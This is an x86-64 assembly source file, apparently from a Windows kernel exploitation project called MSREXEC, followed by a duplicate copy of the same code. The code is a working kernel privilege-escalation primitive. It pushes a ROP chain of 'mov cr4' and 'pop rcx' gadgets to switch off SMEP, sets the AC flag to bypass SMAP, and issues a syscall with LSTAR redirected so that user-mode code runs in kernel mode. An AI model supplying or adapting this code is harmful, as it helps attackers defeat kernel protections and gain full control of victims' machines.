Theodosius/Examples/Theodosius-Kernel/Theodosius-MSREXEC/syscall_handler.asm

extern msrexec_handler : proc

.data
	; offsets into _KPCR/_KPRCB
	m_kpcr_rsp_offset  dq	0h		
	m_kpcr_krsp_offset dq	0h
	m_system_call	   dq	0h

	m_mov_cr4_gadget dq 0h
	m_sysret_gadget  dq 0h
	m_pop_rcx_gadget dq 0h

	m_smep_on  dq	0h
	m_smep_off dq	0h

	public m_smep_on
	public m_smep_off

	public m_kpcr_rsp_offset
	public m_kpcr_krsp_offset

	public m_pop_rcx_gadget
	public m_mov_cr4_gadget
	public m_sysret_gadget
	public m_system_call

.code
syscall_handler proc
	swapgs														; swap gs to kernel gs (_KPCR...)

	mov rax, m_kpcr_rsp_offset									; save usermode stack to _KPRCB
	mov gs:[rax], rsp

	mov rax, m_kpcr_krsp_offset									; load kernel rsp....
	mov rsp, gs:[rax]

	push rcx													; push RIP
	push r11													; push EFLAGS

	mov rcx, r10												; swapped by syscall instruction so we switch it back...
	sub rsp, 020h
	call msrexec_handler										; call c++ handler (which restores LSTAR and calls lambda...)
	add rsp, 020h

	pop r11														; pop EFLAGS
	pop rcx														; pop RIP

	mov rax, m_kpcr_rsp_offset									; restore rsp back to usermode stack...
	mov rsp, gs:[rax]											

	swapgs														; swap back to TIB...
	ret
syscall_handler endp

syscall_wrapper proc
	push r10													; syscall puts RIP into rcx...
	pushfq

	mov r10, rcx												; swap r10 and rcx...
	push m_sysret_gadget										; REX.W prefixed...

	lea rax, finish												; preserved value of RIP by putting it on the stack here...
	push rax													;

	push m_pop_rcx_gadget										; gadget to put RIP back into rcx...
	push m_mov_cr4_gadget										; turn smep back on...

	push m_smep_on												; value of CR4 with smep off...
	push m_pop_rcx_gadget										;

	lea rax, syscall_handler									; rop to syscall_handler to handle the syscall...
	push rax													;

	push m_mov_cr4_gadget										; disable smep...
	push m_smep_off												; 

	pushfq														; THANK YOU DREW YOU SAVED THE PROJECT!!!
	pop rax														; this will set the AC flag in EFLAGS which "disables SMAP"...
	or rax, 040000h												;
	push rax													;
	popfq														;

	syscall														; LSTAR points at a pop rcx gadget... 
																; it will put m_smep_off into rcx...
finish:
	popfq														; restore EFLAGS...
	pop r10														; restore r10...
	ret
syscall_wrapper endp
end
init commit 4 years ago			`extern msrexec_handler : proc`

			`.data`
			`; offsets into _KPCR/_KPRCB`
			`m_kpcr_rsp_offset dq 0h`
			`m_kpcr_krsp_offset dq 0h`
			`m_system_call dq 0h`

			`m_mov_cr4_gadget dq 0h`
			`m_sysret_gadget dq 0h`
			`m_pop_rcx_gadget dq 0h`

			`m_smep_on dq 0h`
			`m_smep_off dq 0h`

			`public m_smep_on`
			`public m_smep_off`

			`public m_kpcr_rsp_offset`
			`public m_kpcr_krsp_offset`

			`public m_pop_rcx_gadget`
			`public m_mov_cr4_gadget`
			`public m_sysret_gadget`
			`public m_system_call`

			`.code`
			`syscall_handler proc`
			`swapgs ; swap gs to kernel gs (_KPCR...)`

			`mov rax, m_kpcr_rsp_offset ; save usermode stack to _KPRCB`
			`mov gs:[rax], rsp`

			`mov rax, m_kpcr_krsp_offset ; load kernel rsp....`
			`mov rsp, gs:[rax]`

			`push rcx ; push RIP`
			`push r11 ; push EFLAGS`

			`mov rcx, r10 ; swapped by syscall instruction so we switch it back...`
			`sub rsp, 020h`
			`call msrexec_handler ; call c++ handler (which restores LSTAR and calls lambda...)`
			`add rsp, 020h`

			`pop r11 ; pop EFLAGS`
			`pop rcx ; pop RIP`

			`mov rax, m_kpcr_rsp_offset ; restore rsp back to usermode stack...`
			`mov rsp, gs:[rax]`

			`swapgs ; swap back to TIB...`
			`ret`
			`syscall_handler endp`

			`syscall_wrapper proc`
			`push r10 ; syscall puts RIP into rcx...`
			`pushfq`

			`mov r10, rcx ; swap r10 and rcx...`
			`push m_sysret_gadget ; REX.W prefixed...`

			`lea rax, finish ; preserved value of RIP by putting it on the stack here...`
			`push rax ;`

			`push m_pop_rcx_gadget ; gadget to put RIP back into rcx...`
			`push m_mov_cr4_gadget ; turn smep back on...`

			`push m_smep_on ; value of CR4 with smep off...`
			`push m_pop_rcx_gadget ;`

			`lea rax, syscall_handler ; rop to syscall_handler to handle the syscall...`
			`push rax ;`

			`push m_mov_cr4_gadget ; disable smep...`
			`push m_smep_off ;`

			`pushfq ; THANK YOU DREW YOU SAVED THE PROJECT!!!`
			`pop rax ; this will set the AC flag in EFLAGS which "disables SMAP"...`
			`or rax, 040000h ;`
			`push rax ;`
			`popfq ;`

			`syscall ; LSTAR points at a pop rcx gadget...`
			`; it will put m_smep_off into rcx...`
			`finish:`
			`popfq ; restore EFLAGS...`
			`pop r10 ; restore r10...`
			`ret`
			`syscall_wrapper endp`
			`end`